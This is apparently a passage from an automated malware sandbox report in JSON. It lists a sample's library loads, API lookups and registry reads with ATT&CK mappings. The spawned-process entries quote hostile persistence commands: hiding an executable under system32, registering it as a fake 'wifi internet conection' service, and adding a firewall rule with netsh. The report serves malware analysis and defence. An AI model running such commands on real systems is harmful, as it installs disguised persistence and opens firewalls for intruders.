loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 6d7d0000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75a90000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75f70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73730000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 6e200000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 75330000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ba0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 749d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005864)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006104)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006104)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006104)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006104)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005960)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005960)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005960)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005960)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005960)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005960)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005972)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005972)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005972)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005972)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005972)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005972)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002240)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002780)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002780)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00002700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002700)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F70000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F70000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F70000\n \"hfopyujf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F70000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F70000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F70000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hfopyujf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hfopyujf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00006104) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00006104) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"hfopyujf.exe\" (UID: 00000000-00002240) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"hfopyujf.exe\" (UID: 00000000-00002240) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00002780) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00002780) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00002700) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00002700) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\dzhrysuy\\\\\" (UID: 00000000-00006104)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hfopyujf.exe\" %WINDIR%\\\\system32\\\\dzhrysuy\\\\\" (UID: 00000000-00005952)\n Spawned process \"sc.exe\" with commandline \"create dzhrysuy binPath= \"%WINDIR%\\\\system32\\\\dzhrysuy\\\\hfopyujf ...\" (UID: 00000000-00005960), Spawned process \"sc.exe\" with commandline \"description dzhrysuy \"wifi internet conection\"\" (UID: 00000000-00006008), Spawned process \"sc.exe\" with commandline \"start dzhrysuy\" (UID: 00000000-00005972), Spawned process \"hfopyujf.exe\" with commandline \"/d\"C:\\\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e1 ...\" (UID: 00000000-00002240)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002780), Spawned process \"svchost.exe\" (UID: 00000000-00002700)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\dzhrysuy\\\\\" (UID: 00000000-00006104)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hfopyujf.exe\" %WINDIR%\\\\system32\\\\dzhrysuy\\\\\" (UID: 00000000-00005952)\n Spawned process \"sc.exe\" with commandline \"create dzhrysuy binPath= \"%WINDIR%\\\\system32\\\\dzhrysuy\\\\hfopyujf ...\" (UID: 00000000-00005960), Spawned process \"sc.exe\" with commandline \"description dzhrysuy \"wifi internet conection\"\" (UID: 00000000-00006008), Spawned process \"sc.exe\" with commandline \"start dzhrysuy\" (UID: 00000000-00005972), Spawned process \"hfopyujf.exe\" with commandline \"/d\"C:\\\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e1 ...\" (UID: 00000000-00002240)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002780), Spawned process \"svchost.exe\" (UID: 00000000-00002700)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"hfopyujf.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"hfopyujf.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"hfopyujf.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67EE5D5B.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE5D5B.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE5D5B.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67EE5D5B.bin\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005864)\n 